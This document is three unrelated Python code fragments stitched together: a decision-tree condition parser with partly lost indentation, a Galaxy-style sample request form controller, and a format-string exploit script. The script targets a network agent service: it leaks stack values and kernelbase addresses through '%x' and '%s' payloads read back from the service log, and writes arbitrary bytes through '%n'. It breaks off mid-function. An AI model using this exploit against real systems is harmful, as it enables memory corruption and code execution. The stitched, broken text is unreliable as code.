self.mError = None
self.mCondAtoms = None
for frag_h in self.mFragments:
self.mError = frag_h.getErrorInfo()
if self.mError is not None:
break
if self.mError is None:
for idx, frag_h in enumerate(self.mFragments[:-1]):
if frag_h.getLevel() == 0 and frag_h.getDecision() is not None:
err_info = ("Final instruction not in final place",
frag_h.getLineDiap()[0], 0)
self.mFragments[idx] = TreeFragment(0, "Error",
frag_h.getLineDiap(), err_info = err_info)
self.mError = err_info
break
if self.mError is None:
last_frag_h = self.mFragments[-1]
if last_frag_h.getLevel() > 0 or last_frag_h.getDecision() is None:
err_info = ("Final instruction must return True or False",
last_frag_h.getLineDiap()[0], 0)
self.mFragments[-1] = TreeFragment(0, "Error",
frag_h.getLineDiap(), err_info = err_info)
self.mError = err_info
if self.mFirstError is None:
self.mFirstError = self.mError
    def getError(self):
        # First parse error as (message, line, col), or None if parsing
        # finished cleanly.
        return self.mFirstError

    def getTreeCode(self):
        # Normalized source text of the decision tree.
        return self.mCode

    def getEvalSpace(self):
        # Evaluation space used to resolve units, or None for syntax-only
        # parsing.
        return self.mEvalSpace

    def getFragments(self):
        # All parsed TreeFragment instances, in source order.
        return self.mFragments

    def getHashCode(self):
        # md5 hex digest over the meaningful (non-dummy) source lines;
        # identifies this version of the tree.
        return self.mHashCode

    def isLineIsDummy(self, line_no):
        # True if the 1-based source line carries no meaningful code
        # (blank/comment), as registered by parseCodeByPortions.
        return line_no in self.mDummyLinesReg
def errorIt(self, it, msg_text):
self.mError = (msg_text,
it.lineno + self.mCurLineDiap[0] - 1, it.col_offset)
if self.mFirstError is None:
self.mFirstError = self.mError
raise RuntimeError()
def errorMsg(self, line_no, col_offset, msg_text):
self.mError = (msg_text,
line_no + self.mCurLineDiap[0] - 1, col_offset)
if self.mFirstError is None:
self.mFirstError = self.mError
raise RuntimeError()
def _regCondAtom(self, cond_data, it, it_name, warn_msg = None):
self.mCondAtoms.append(
CondAtomInfo(cond_data,
[it.lineno + self.mCurLineDiap[0] - 1,
it.col_offset,
it.col_offset + len(it_name)], warn_msg))
#===============================================
def processIf(self, instr_d):
self.mCondAtoms = []
cond_data = self._processCondition(instr_d.test)
if len(instr_d.orelse) > 0:
self.errorIt(instr_d.orelse[0],
"Else instruction is not supported")
line_from, line_to = self.mCurLineDiap
decision = self.getSingleReturnValue(instr_d.body)
line_decision = instr_d.body[0].lineno + line_from - 1
ret = [
TreeFragment(0, "If", (line_from, line_decision),
cond_atoms = self.mCondAtoms, cond_data = cond_data),
TreeFragment(1, "Return",
(line_decision, line_to), decision = decision)]
self.mCondAtoms = None
return ret
#===============================================
def processCall(self, instr, point_no):
assert isinstance(instr, ast.Call)
if instr.func.id != "label":
self.errorIt(instr, "Only label() function supported on top level")
if len(instr.args) != 1 or len(instr.keywords) != 0:
self.errorIt(instr, "Only one argument expected for label()")
if isinstance(instr.args[0], ast.Str):
label = instr.args[0].s
elif isinstance(instr.args[0], ast.Name):
label = instr.args[0].id
else:
self.errorIt(instr.args[0],
"String is expected as argument of label()")
if label in self.mLabels:
self.errorIt(instr, "Duplicate label %s" % label)
self.mLabels[label] = point_no
frag_h = TreeFragment(0, "Label", self.mCurLineDiap, label = label)
return frag_h
#===============================================
def getReturnValue(self, instr):
if isinstance(instr.value, ast.NameConstant):
if instr.value.value in (True, False):
return instr.value.value
self.errorIt(instr,
"Only boolean return (True/False) is expected here")
return None
#===============================================
def getSingleReturnValue(self, body):
assert len(body) >= 1
if len(body) > 1:
self.errorIt(body[1],
"Only one instruction is expected here")
instr = body[0]
if not isinstance(instr, ast.Return):
self.errorIt(instr, "Only return instruction is expected here")
return self.getReturnValue(instr)
#===============================================
    def _processCondition(self, it):
        """Recursively normalize an AST condition into nested list form:
        ["and"|"or", ...], ["not", <cond>], or an atom produced by
        _processEnumInstr/_processNumInstr. Empty lists (dropped atoms from
        inactive fields) are pruned from and/or sequences."""
        if isinstance(it, ast.BoolOp):
            if isinstance(it.op, ast.And):
                seq = ["and"]
            elif isinstance(it.op, ast.Or):
                seq = ["or"]
            else:
                self.errorIt(it, "Logic operation not supported")
            for val in it.values:
                rep_el = self._processCondition(val)
                # Skip atoms that evaluated to nothing (inactive fields).
                if len(rep_el) == 0:
                    continue
                # Flatten nested operations of the same kind:
                # ["and", a, ["and", b, c]] -> ["and", a, b, c].
                if rep_el[0] == seq[0]:
                    seq += rep_el[1:]
                else:
                    seq.append(rep_el)
            if len(seq) == 0:
                return []
            return seq
        if isinstance(it, ast.UnaryOp):
            if not isinstance(it.op, ast.Not):
                self.errorIt(it, "Unary operation not supported")
            return ["not", self._processCondition(it.operand)]
        if not isinstance(it, ast.Compare):
            self.errorIt(it, "Comparison or logic operation expected")
        # `x in {...}` / `x not in {...}` is an enum condition; every other
        # comparison is treated as numeric.
        if len(it.ops) == 1 and (isinstance(it.ops[0], ast.In)
                or isinstance(it.ops[0], ast.NotIn)):
            return self._processEnumInstr(it)
        return self._processNumInstr(it)
#===============================================
    def _processEnumInstr(self, it):
        """Normalize an enum membership condition.

        Handles `field in {...}`, `field not in {...}` and
        `field in all({...})`, for plain enum fields (ast.Name on the left)
        and functional fields (ast.Call on the left). Produces
        ["enum", name, op_mode, variants] or
        ["func", name, op_mode, variants, func_args]; inactive fields
        degrade to [] / [None] with a warning instead of an error.
        """
        assert len(it.comparators) == 1
        it_set = it.comparators[0]
        # NOT <-> `not in`, OR <-> `in`; AND is set below for the all() form.
        if isinstance(it.ops[0], ast.NotIn):
            op_mode = "NOT"
        else:
            assert isinstance(it.ops[0], ast.In)
            op_mode = "OR"
        if isinstance(it_set, ast.Call):
            if (len(it_set.args) != 1 or len(it_set.keywords) > 0
                    or not it_set.func
                    or not isinstance(it_set.func, ast.Name)):
                self.errorIt(it_set, "Complex call not supported")
            if it_set.func.id == "all":
                # `not in all(...)` has no defined semantics here.
                if op_mode == "NOT":
                    self.errorIt(it_set, "Complex call not supported")
                op_mode = "AND"
                it_set = it_set.args[0]
            else:
                self.errorIt(it_set,
                    "Only pseudo-function all is supported")
        variants = self.processIdSet(it_set)
        #if len(variants) == 0:
        #    self.errorIt(it_set, "Empty set")
        if isinstance(it.left, ast.Name):
            # Plain enum field condition.
            field_name = it.left.id
            warn_msg = None
            ret = ["enum", field_name, op_mode, variants]
            if self.mEvalSpace is not None:
                unit_h = self.mEvalSpace.getUnit(field_name)
                if unit_h is None:
                    # Unknown/inactive field: degrade instead of failing --
                    # `not in` becomes vacuously true ([]), `in` undecidable
                    # ([None]).
                    warn_msg = "Inactive enum field"
                    if op_mode == "NOT":
                        ret = []
                    else:
                        ret = [None]
                else:
                    if not unit_h.isInDTrees():
                        self.errorIt(it.left,
                            "No support for field %s in decision trees"
                            % field_name)
                    elif unit_h.getUnitKind() == "func":
                        self.errorIt(it.left,
                            "Field %s should be used as function" % field_name)
                    if unit_h.getUnitKind() != "enum":
                        self.errorIt(it.left, "Improper enum field name: "
                            + field_name)
            self._regCondAtom(ret, it.left, it.left.id, warn_msg)
            return ret
        if isinstance(it.left, ast.Call):
            # Functional field condition: field(args...) in {...}.
            field_name = it.left.func.id
            func_args, warn_msg = dict(), None
            ret = ["func", field_name, op_mode, variants, func_args]
            if self.mEvalSpace is None:
                # No parameters w/o eval space, parse only
                del ret[2:]
            else:
                unit_h = self.mEvalSpace.getUnit(field_name)
                if unit_h is None:
                    warn_msg = "Inactive function"
                    if op_mode == "NOT":
                        ret = []
                    else:
                        ret = [None]
                elif unit_h.getUnitKind() != "func":
                    self.errorIt(it.left, "Improper functional field name: "
                        + field_name)
                else:
                    # Bind positional arguments in declared parameter order,
                    # then keyword arguments, rejecting extras/duplicates.
                    parameters = unit_h.getParameters()[:]
                    for it_arg in it.left.args:
                        if len(parameters) == 0:
                            self.errorIt(it_arg, "Extra argument of function")
                        func_args[parameters.pop(0)] = self.processJSonData(
                            it_arg)
                    for argval_it in it.left.keywords:
                        if argval_it.arg in func_args:
                            self.errorIt(argval_it.value,
                                "Argument %s duplicated" % argval_it.arg)
                        if argval_it.arg not in parameters:
                            self.errorIt(argval_it.value,
                                "Argument %s not expected" % argval_it.arg)
                        func_args[argval_it.arg] = self.processJSonData(
                            argval_it.value)
                        parameters.remove(argval_it.arg)
                    err_msg = unit_h.validateArgs(func_args)
                    if err_msg:
                        self.errorIt(it.left, err_msg)
            self._regCondAtom(ret, it.left, it.left.func.id, warn_msg)
            return ret
        self.errorIt(it.left, "Name of field is expected")
        return None
#===============================================
sNumOpTab = [
(ast.Lt, 1, False),
(ast.LtE, 1, True),
(ast.Eq, 0, True),
(ast.GtE, -1, True),
(ast.Gt, -1, False)]
@classmethod
def determineNumOp(cls, op):
for op_class, ord_mode, eq_mode in cls.sNumOpTab:
if isinstance(op, op_class):
return (ord_mode, eq_mode)
return None, None
def _processNumInstr(self, it):
op_modes = []
for op in it.ops:
if len(op_modes) > 1:
op_modes | |
) )
folder_id = util.restore_text( params.get( 'sample_%i_folder_id' % index, '' ) )
library, folder = self.__get_library_and_folder( trans, library_id, folder_id )
history_id = util.restore_text( params.get( 'sample_%i_history_id' % index, '' ))
if not history_id and sample.history:
history_id = trans.security.encode_id( sample.history.id )
history = self.__get_history(trans, history_id)
wf_tag = 'sample_%i_workflow_id' % index
workflow_id = util.restore_text( params.get( wf_tag , '' ) )
if not workflow_id and sample.workflow:
workflow_id = trans.security.encode_id( sample.workflow['id'] )
workflow_dict = sample.workflow
workflow = self.__get_workflow(trans, workflow_id)
else:
workflow_dict = None
workflow = self.__get_workflow(trans, workflow_id)
if workflow:
workflow_dict = {'id': workflow.id,
'name' : workflow.name,
'mappings': {}}
for k, v in kwd.iteritems():
kwd_tag = "%s_" % wf_tag
if k.startswith(kwd_tag):
# DBTODO Change the key to include the dataset tag, not just the names.
workflow_dict['mappings'][int(k[len(kwd_tag):])] = {'ds_tag':v}
field_values = {}
for field_index, field in enumerate( request.type.sample_form.fields ):
field_name = field['name']
input_value = params.get( 'sample_%i_field_%i' % ( index, field_index ), '' )
if field['type'] == CheckboxField.__name__:
field_value = CheckboxField.is_checked( input_value )
else:
field_value = util.restore_text( input_value )
field_values[ field_name ] = field_value
library_select_field, folder_select_field = self.__build_library_and_folder_select_fields( trans=trans,
user=request.user,
sample_index=index,
libraries=libraries,
sample=None,
library_id=library_id,
folder_id=folder_id,
**kwd )
history_select_field = self.__build_history_select_field( trans=trans,
user=request.user,
sample_index=index,
sample=None,
history_id=history_id,
**kwd)
workflow_select_field = self.__build_workflow_select_field( trans=trans,
user=request.user,
request=request,
sample_index=index,
sample=None,
workflow_dict=workflow_dict,
history_id=history_id,
**kwd)
sample_widgets.append( dict( id=None,
name=name,
bar_code=bar_code,
library=library,
folder=folder,
field_values=field_values,
history=history,
workflow=workflow,
workflow_dict=workflow_dict,
history_select_field=history_select_field,
workflow_select_field=workflow_select_field,
library_select_field=library_select_field,
folder_select_field=folder_select_field ) )
index += 1
return sample_widgets
# ===== Methods for building SelectFields used on various request forms =====
def __build_copy_sample_select_field( self, trans, displayable_sample_widgets ):
    """Return a SelectField listing every displayable sample by index, with 'None' preselected."""
    select_field = SelectField( 'copy_sample_index' )
    # The -1 sentinel option means "do not copy values from any existing sample".
    select_field.add_option( 'None', -1, selected=True )
    for position, widget_dict in enumerate( displayable_sample_widgets ):
        select_field.add_option( widget_dict[ 'name' ], position )
    return select_field
def __build_request_type_id_select_field( self, trans, selected_value='none' ):
    """Build the request_type_id SelectField from the request types accessible to the current user."""
    request_types = trans.app.security_agent.get_accessible_request_types( trans, trans.user )
    # refresh_on_change so the form re-renders with the chosen type's sample fields.
    return build_select_field( trans, request_types, 'name', 'request_type_id', selected_value=selected_value, refresh_on_change=True )
def __build_user_id_select_field( self, trans, selected_value='none' ):
    """Build the user_id SelectField listing all non-deleted users, ordered by email."""
    # NOTE: '== False' is intentional -- it builds a SQLAlchemy filter expression;
    # 'is False' or 'not ...' would not translate into SQL.
    active_users = trans.sa_session.query( trans.model.User ) \
                                   .filter( trans.model.User.table.c.deleted == False ) \
                                   .order_by( trans.model.User.email.asc() )
    # A refresh_on_change is required so the user's set of addresses can be displayed.
    return build_select_field( trans, active_users, 'email', 'user_id', selected_value=selected_value, refresh_on_change=True )
def __build_sample_operation_select_field( self, trans, is_admin, request, selected_value ):
    """Build the sample_operation SelectField listing the bulk operations allowed for this request/user."""
    # The sample_operation SelectField is displayed only after the request has been submitted.
    # its label is "For selected samples"
    if is_admin:
        if request.is_complete:
            bulk_operations = [ trans.model.Sample.bulk_operations.CHANGE_STATE ]
        # NOTE(review): when the request is complete but NOT rejected, the else branch
        # below overwrites the CHANGE_STATE assignment above with the full operation
        # list -- this reads like it was meant to be an elif chain; confirm intent.
        if request.is_rejected:
            bulk_operations = [ trans.model.Sample.bulk_operations.SELECT_LIBRARY ]
        else:
            bulk_operations = [ s for i, s in trans.model.Sample.bulk_operations.items() ]
    else:
        # Non-admins may only target libraries, and only while the request is open.
        if request.is_complete:
            bulk_operations = []
        else:
            bulk_operations = [ trans.model.Sample.bulk_operations.SELECT_LIBRARY ]
    return build_select_field( trans, bulk_operations, 'self', 'sample_operation', selected_value=selected_value, refresh_on_change=True )
def __build_library_and_folder_select_fields( self, trans, user, sample_index, libraries, sample=None, library_id=None, folder_id=None, **kwd ):
    """Return a ( library_select_field, folder_select_field ) pair for one sample.

    sample_index is either an int (per-sample widgets) or the literal string
    'sample_operation' (bulk-operation widgets); it determines the field names.
    """
    # Create the library_id SelectField for a specific sample. The received libraries param is a list of all the libraries
    # accessible to the current user, and we add them as options to the library_select_field. If the user has selected an
    # existing library then display all the folders of the selected library in the folder_select_field. Library folders do
    # not have ACCESS permissions associated with them (only LIBRARY_ADD, LIBRARY_MODIFY, LIBRARY_MANAGE), so all folders will
    # be present in the folder_select_field for each library selected.
    params = util.Params( kwd )
    if sample_index == 'sample_operation':
        # build the library selection widget for the bulk sample operation
        library_select_field_name= "sample_operation_library_id"
        folder_select_field_name = "sample_operation_folder_id"
    else:
        library_select_field_name= "sample_%i_library_id" % sample_index
        folder_select_field_name = "sample_%i_folder_id" % sample_index
    # Explicit arguments win; otherwise fall back to values posted with the form.
    if not library_id:
        library_id = params.get( library_select_field_name, None )
    if not folder_id:
        folder_id = params.get( folder_select_field_name, None )
    selected_library = None
    if library_id not in [ None, 'none' ]:
        # Find the selected library among those accessible to the user.
        for library in libraries:
            encoded_id = trans.security.encode_id( library.id )
            if encoded_id == str( library_id ):
                selected_library = library
                break
    elif sample and sample.library and library_id == 'none':
        # The user previously selected a library but is now resetting the selection to 'none'
        selected_library = None
    elif sample and sample.library:
        # Default to the library already associated with the sample.
        library_id = trans.security.encode_id( sample.library.id )
        selected_library = sample.library
    # Build the sample_%i_library_id SelectField with refresh on change enabled
    library_select_field = build_select_field( trans,
                                               libraries,
                                               'name',
                                               library_select_field_name,
                                               initial_value='none',
                                               selected_value=str( library_id ).lower(),
                                               refresh_on_change=True )
    # Get all folders for the selected library, if one is indeed selected
    if selected_library:
        folders = self.__get_active_folders( selected_library.root_folder, active_folders_list=[ selected_library.root_folder ] )
        if folder_id:
            selected_folder_id = folder_id
        elif sample and sample.folder:
            selected_folder_id = trans.security.encode_id( sample.folder.id )
        else:
            # Default to the library's root folder.
            selected_folder_id = trans.security.encode_id( selected_library.root_folder.id )
    else:
        selected_folder_id = 'none'
        folders = []
    # Change the name of the library root folder to clarify that it is the root
    for folder in folders:
        if not folder.parent:
            folder.name = 'Data library root'
            break
    folder_select_field = build_select_field( trans,
                                              folders,
                                              'name',
                                              folder_select_field_name,
                                              initial_value='none',
                                              selected_value=selected_folder_id )
    return library_select_field, folder_select_field
def __build_history_select_field(self, trans, user, sample_index, sample=None, history_id=None, **kwd):
    """Build the sample_%i_history_id SelectField for one sample.

    Lists the user's non-deleted histories, defaulting to the history already
    associated with the sample when one exists; the first option is replaced
    with a 'Select one' placeholder.
    """
    params = util.Params( kwd )
    history_select_field_name = "sample_%i_history_id" % sample_index
    if not history_id:
        history_id = params.get( history_select_field_name, None )
    selected_history = None
    if history_id not in [ None, 'none', 'new' ]:
        # Find the selected history among the user's non-deleted histories.
        for history in user.histories:
            if not history.deleted:
                encoded_id = trans.security.encode_id( history.id )
                if encoded_id == str( history_id ):
                    selected_history = history
                    break
    elif sample and sample.history and ( history_id == 'none' or history_id == 'new' ):
        # BUGFIX: parenthesized the 'or'. The original unparenthesized condition
        # parsed as '(sample and sample.history and id == "none") or id == "new"',
        # letting 'new' alone take this branch regardless of the sample.
        # The user previously selected a history but is now resetting the selection.
        selected_history = None
    elif sample and sample.history:
        # Default to the history already associated with the sample.
        history_id = trans.security.encode_id( sample.history.id )
        selected_history = sample.history
    # NOTE(review): selected_history is never read below -- only the history_id
    # reassignment above affects the widget; kept for parity with the sibling builders.
    # NOTE(review): the original comment said "refresh on change disabled" but
    # refresh_on_change=True is passed -- the code is kept as-is.
    hsf = build_select_field( trans,
                              [ h for h in user.histories if not h.deleted ],
                              'name',
                              history_select_field_name,
                              initial_value='none',
                              selected_value=str( history_id ).lower(),
                              refresh_on_change=True )
    # This is ugly, but allows for an explicit "New History", while still using build_select_field.
    # hsf.options = hsf.options[:1] + [( "Create a New History", 'new', 'new'==str( history_id ).lower() )] + hsf.options[1:]
    hsf.options = [ ( "Select one", 'none', 'none' == str( history_id ).lower() ) ] + hsf.options[1:]
    return hsf
def __build_workflow_select_field(self, trans, user, request, sample_index, sample=None, workflow_id=None, workflow_dict=None, history_id=None, **kwd ):
    """Build the workflow widgets for one sample.

    Returns a list whose first element is the sample_%i_workflow_id SelectField;
    when a workflow is selected and the request type has an external service
    configured, one ( input_name, SelectField ) pair is appended per data_input
    step so datasets can be mapped to workflow inputs.
    """
    params = util.Params( kwd )
    workflow_select_field_name = "sample_%i_workflow_id" % sample_index
    selected_workflow = None
    if not workflow_id:
        workflow_id = params.get( workflow_select_field_name, None )
    if workflow_id not in [ None, 'none' ]:
        selected_workflow = trans.sa_session.query( trans.model.Workflow ).get( trans.security.decode_id( workflow_id ) )
    elif sample and sample.workflow and workflow_id == 'none':
        # The user previously selected a workflow but is now resetting the selection to 'none'.
        selected_workflow = None
    elif sample and sample.workflow:
        # Default to the workflow already associated with the sample.
        workflow_id = sample.workflow['id']
        selected_workflow = trans.sa_session.query( trans.model.Workflow ).get( sample.workflow['id'] )
    # Offer the latest version of each of the user's non-deleted stored workflows.
    s_list = [ w.latest_workflow for w in user.stored_workflows if not w.deleted ]
    if selected_workflow and selected_workflow not in s_list:
        s_list.append( selected_workflow )
    workflow_select_field = build_select_field( trans,
                                                s_list,
                                                'name',
                                                workflow_select_field_name,
                                                initial_value='none',
                                                selected_value=str( workflow_id ).lower(),
                                                refresh_on_change=True )
    workflow_select_field.options = [ ( "Select one", 'none', 'none' == str( workflow_id ).lower() ) ] + workflow_select_field.options[1:]
    wf_fieldset = [ workflow_select_field ]
    if selected_workflow and request.type.external_services:
        # DBTODO This will work for now, but should be handled more rigorously.
        ds_list = []
        external_service = request.type.external_services[0]
        # BUGFIX: raw string -- '\d' in a plain string literal is an invalid
        # escape (DeprecationWarning, SyntaxError in newer Pythons); the
        # compiled pattern is unchanged.
        dataset_name_re = re.compile( r'(dataset\d+)_(name)' )
        for k, v in external_service.form_values.content.items():
            match = dataset_name_re.match( k )
            if match:
                # Strip the trailing '_name' to recover the dataset tag.
                ds_list.append( ( "ds|%s" % k[:-5], v ) )
        if history_id not in [ None, 'none', 'new', '' ]:
            # Also offer the non-deleted datasets of the selected history.
            hist = trans.sa_session.query( trans.model.History ).get( trans.security.decode_id( history_id ) )
            h_inputs = [ ( "hi|%s" % trans.security.encode_id( ds.id ), ds.name ) for ds in hist.datasets if not ds.deleted ]
            ds_list += h_inputs
        for step in selected_workflow.steps:
            if step.type == 'data_input':
                if step.tool_inputs and "name" in step.tool_inputs:
                    sf_name = '%s_%s' % ( workflow_select_field_name, step.id )
                    select_field = SelectField( name=sf_name )
                    sf = params.get( sf_name, None )
                    if not sf and sample and sample.workflow:
                        # Fall back to the mapping stored with the sample's workflow.
                        # (py2-only has_key() replaced with 'in' -- same behavior.)
                        if str( step.id ) in sample.workflow['mappings']:
                            sf = sample.workflow['mappings'][ str( step.id ) ]['ds_tag']
                    for value, label in ds_list:
                        if value == sf:
                            select_field.add_option( label, value, selected=True )
                        else:
                            select_field.add_option( label, value )
                    wf_fieldset.append( ( step.tool_inputs['name'], select_field ) )
    return wf_fieldset
def __build_sample_state_id_select_field( self, trans, request, selected_value ):
    """Build the sample_state_id SelectField; default to the first sample's current state or the type's initial state."""
    if selected_value == 'none':
        default_state = request.samples[0].state if request.samples else request.type.states[0]
        selected_value = trans.security.encode_id( default_state.id )
    return build_select_field( trans,
                               objs=request.type.states,
                               label_attr='name',
                               select_field_name='sample_state_id',
                               selected_value=selected_value,
                               refresh_on_change=False )
# ===== Methods for validation forms and fields =====
def __validate_request( self, trans, cntrller, request ):
"""Validates the request entered by the user"""
# TODO: Add checks for required sample fields here.
empty_fields = []
# Make sure required form fields are filled in.
for index, field in enumerate( request.type.request_form.fields ):
if field[ 'required' ] == 'required' and request.values.content[ field[ 'name' ] ] in [ '', None ]:
empty_fields.append( field[ 'label' ] )
empty_sample_fields = []
for s in request.samples:
for field | |
#!/usr/bin/env python3
import socket
import sys
import subprocess
from struct import pack
# Initial log-read offset shared with the leak helpers; raising it skips
# already-dumped log pages on repeated runs.
start_value = 0x00  # Default 0x00. Set higher to speed up runs.
def receive_data(s: socket.socket) -> bytes:
    """Read from *s* until a short read (< 4096 bytes) or a socket error.

    Returns every byte received.  BUGFIX: the annotation was 's: socket',
    i.e. the module object, not the socket class.

    NOTE: a response whose length is an exact multiple of 4096 triggers one
    extra recv() that relies on the caller's socket timeout to return.
    """
    received = b""
    try:
        while True:
            data = s.recv(4096)
            received += data
            # A short read marks the end of the response.
            if len(data) < 4096:
                break
    except Exception as e:
        # Best effort: a timeout/reset simply ends the read; keep what arrived.
        print(e)
    return received
def dump_stack_values_to_log(s: socket):
    """Send a '%x'-laden format string (opcode 0x604) so the service dumps stack values into its log."""
    # psAgentCommand header: big-endian total size, filler, opcode,
    # three (offset, size) memcpy pairs, trailing filler.
    buf = pack(">i", 0x400)
    buf += b"\x41" * 0xC
    buf += pack("<i", 0x604)            # opcode
    for region_offset, region_size in ((0x0, 0x100), (0x100, 0x100), (0x200, 0x100)):
        buf += pack("<i", region_offset)    # memcpy: offset
        buf += pack("<i", region_size)      # memcpy: size field
    buf += b"\x41" * 0x8
    # psCommandBuffer: 'w00t' marker followed by 0x80 '%x:' leaks.
    buf += b"w00t:BBAAAA" + b"%x:" * 0x80
    buf += b"B" * 0x100
    buf += b"C" * 0x100
    # Pad the request to the fixed 0x404-byte command size.
    buf += b"\x41" * (0x404 - len(buf))
    s.send(buf)
    receive_data(s)
def dump_stack_pointer_to_log(s: socket, address: int):
    """Leak the bytes at *address* into the log via a '%s' format-string read (opcode 0x604)."""
    # psAgentCommand header: big-endian total size, filler, opcode,
    # three (offset, size) memcpy pairs, trailing filler.
    buf = pack(">i", 0x400)
    buf += b"\x41" * 0xC
    buf += pack("<i", 0x604)            # opcode
    for region_offset, region_size in ((0x0, 0x100), (0x100, 0x100), (0x200, 0x100)):
        buf += pack("<i", region_offset)    # memcpy: offset
        buf += pack("<i", region_size)      # memcpy: size field
    buf += b"\x41" * 0x8
    # psCommandBuffer: marker, planted target address, '%x' pops to walk the
    # stack up to it, then one '%s' to dereference it.
    buf += b"w00t_BB" + pack("<i", address) + b"%x" * 20
    buf += b":%s"
    buf += b"%x" * 0x6b
    buf += b"B" * 0x100
    buf += b"C" * 0x100
    # Pad the request to the fixed 0x404-byte command size.
    buf += b"\x41" * (0x404 - len(buf))
    s.send(buf)
    receive_data(s)
# Memory indices:
# 1 <- Stack address
# 11 <- windows_storage address.
# 13 <- user32 address.
# 17 <- cfgmgr32 address.
def get_latest_leaked_addresses_from_log(s: socket, startValue: int, return_value_count=21):
    """Download the agent log (opcode 0x520) page by page and parse the newest
    'w00t'-marked format-string dump into a list of leaked integers.

    Updates the module-level start_value so later calls resume where this read
    left off.  Returns at most return_value_count parsed values.
    """
    global start_value
    w00t_finds = []
    while True:
        # psAgentCommand
        buf = pack(">i", 0x400)
        buf += bytearray([0x41] * 0xC)
        buf += pack("<i", 0x520)  # opcode
        buf += pack("<i", 0x0)  # 1st memcpy: offset
        buf += pack("<i", 0x100)  # 1st memcpy: size field
        buf += pack("<i", 0x100)  # 2nd memcpy: offset
        buf += pack("<i", 0x100)  # 2nd memcpy: size field
        buf += pack("<i", 0x200)  # 3rd memcpy: offset
        buf += pack("<i", 0x100)  # 3rd memcpy: size field
        buf += bytearray([0x41] * 0x8)
        # psCommandBuffer: request one 0x1000-byte window of log file type 1.
        buf += b"FileType: %d ,Start: %d, Length: %d" % (1, startValue, 0x1000)
        buf += b"B" * 0x100
        buf += b"C" * 0x100
        # Padding
        buf += bytearray([0x41] * (0x404 - len(buf)))
        s.send(buf)
        # First 4 response bytes: big-endian size of the log data that follows.
        response = s.recv(4)
        response_size = int(response.hex(), 16)
        print("Downloading... Start Value: " + str(hex(startValue)) + " Size: " + str(hex(response_size)))
        response = b""
        bytes_downloaded = 0  # NOTE(review): never used
        try:
            while True:
                response += s.recv(4096)
                if len(response) >= response_size:
                    break
        except Exception as e:
            # A timeout simply ends the download; keep whatever arrived.
            print(e)
            print(response_size)
            print(len(response))
        woot_split = response.split(b'w00t')
        if len(woot_split) > 1:
            for i in range(1, len(woot_split)):
                # Keep a bounded slice after each marker -- presumably sized for
                # 0x80 leaked fields of up to 18 chars each; TODO confirm.
                w00t_finds.append(woot_split[i][0:0x80 * 18])
        if response_size >= 0x100000:
            # Log window was full -- advance and keep reading for the newest dump.
            startValue += 0x1000
            continue
        break
    memory_values = []
    # Parse the ':'-separated hex fields of the most recent dump.
    leaked_address_bytes = w00t_finds[-1].split(b':')
    returned_values = 0
    for leaked_address in leaked_address_bytes:
        try:
            memory_values.append(int(leaked_address, 16))
            returned_values += 1
            if returned_values >= return_value_count:
                break
        except:
            # Non-hex fragment (marker text, padding) -- skip it.
            pass
    start_value = startValue
    return memory_values
def get_latest_leaked_kernelbase_from_log(s: socket.socket, startValue: int):
    """Page through the agent log (opcode 0x520) and return the kernelbase
    address leaked by the most recent 'w00t'-marked '%s' read.

    The second ':'-separated field after the final marker holds the pointer
    as 4 raw little-endian bytes.

    Cleanup vs. original: removed the unused 'bytes_downloaded' local and the
    dead 'global start_value' declaration (this function never assigns it),
    and replaced the manual shift/or byte assembly with int.from_bytes.
    """
    w00t_finds = []
    while True:
        # psAgentCommand
        buf = pack(">i", 0x400)
        buf += bytearray([0x41] * 0xC)
        buf += pack("<i", 0x520)  # opcode
        buf += pack("<i", 0x0)  # 1st memcpy: offset
        buf += pack("<i", 0x100)  # 1st memcpy: size field
        buf += pack("<i", 0x100)  # 2nd memcpy: offset
        buf += pack("<i", 0x100)  # 2nd memcpy: size field
        buf += pack("<i", 0x200)  # 3rd memcpy: offset
        buf += pack("<i", 0x100)  # 3rd memcpy: size field
        buf += bytearray([0x41] * 0x8)
        # psCommandBuffer: request one 0x1000-byte window of log file type 1.
        buf += b"FileType: %d ,Start: %d, Length: %d" % (1, startValue, 0x1000)
        buf += b"B" * 0x100
        buf += b"C" * 0x100
        # Padding
        buf += bytearray([0x41] * (0x404 - len(buf)))
        s.send(buf)
        # First 4 response bytes: big-endian size of the log data that follows.
        response = s.recv(4)
        response_size = int(response.hex(), 16)
        print("Downloading... Start Value: " + str(hex(startValue)) + " Size: " + str(hex(response_size)))
        response = b""
        try:
            while True:
                response += s.recv(4096)
                if len(response) >= response_size:
                    break
        except Exception as e:
            # A timeout simply ends the download; keep whatever arrived.
            print(e)
            print(response_size)
            print(len(response))
        woot_split = response.split(b'w00t')
        if len(woot_split) > 1:
            for i in range(1, len(woot_split)):
                w00t_finds.append(woot_split[i][0:0x80 * 18])
        if response_size >= 0x100000:
            # Log window was full -- advance and keep reading for the newest leak.
            startValue += 0x1000
            continue
        break
    # Second field of the newest marker holds the leaked pointer bytes.
    leaked_address_bytes = w00t_finds[-1].split(b':')
    kbString = leaked_address_bytes[1]
    # Little-endian reconstruction of the 4-byte kernelbase address.
    return int.from_bytes(kbString[:4], "little")
def print_memory_values(memory_values: list) -> None:
    """Print each leaked value as 'index: 0x...' for manual inspection.

    IDIOM: replaced 'for i in range(0, len(...))' indexing with enumerate;
    output is unchanged (hex() already returns a str).
    """
    for index, value in enumerate(memory_values):
        print("{}: {}".format(index, hex(value)))
def write_byte_value(s: socket, byte_value: int, write_address: int):
    """Write one byte at *write_address* in the remote process via a '%n'
    format-string write (opcode 0x604).

    The '%x' specifiers pop stack slots until the planted *write_address* is
    the next argument; the '%<width>x' pads the printed character count so its
    low byte equals *byte_value* when '%n' stores it.
    """
    # NOTE(review): the 0xC7/0x39 constants presumably compensate for the number
    # of characters already printed before the '%n' fires (calibrated to this
    # service's stack layout) -- confirm against the target binary.
    if byte_value > 0xC6:
        width = byte_value - 0xC7 + 0x8
    else:
        width = byte_value + 0x39 + 0x8
    # psAgentCommand
    buf = pack(">i", 0x400)
    buf += bytearray([0x41] * 0xC)
    buf += pack("<i", 0x604)  # opcode
    buf += pack("<i", 0x0)  # 1st memcpy: offset
    buf += pack("<i", 0x100)  # 1st memcpy: size field
    buf += pack("<i", 0x100)  # 2nd memcpy: offset
    buf += pack("<i", 0x100)  # 2nd memcpy: size field
    buf += pack("<i", 0x200)  # 3rd memcpy: offset
    buf += pack("<i", 0x100)  # 3rd memcpy: size field
    buf += bytearray([0x41] * 0x8)
    # psCommandBuffer: marker, planted target address, pops, width pad, '%n' write.
    buf += b"w00t:BB" + pack("<i", write_address)
    buf += b"%x" * 5 + b":"
    buf += b"%6x:"
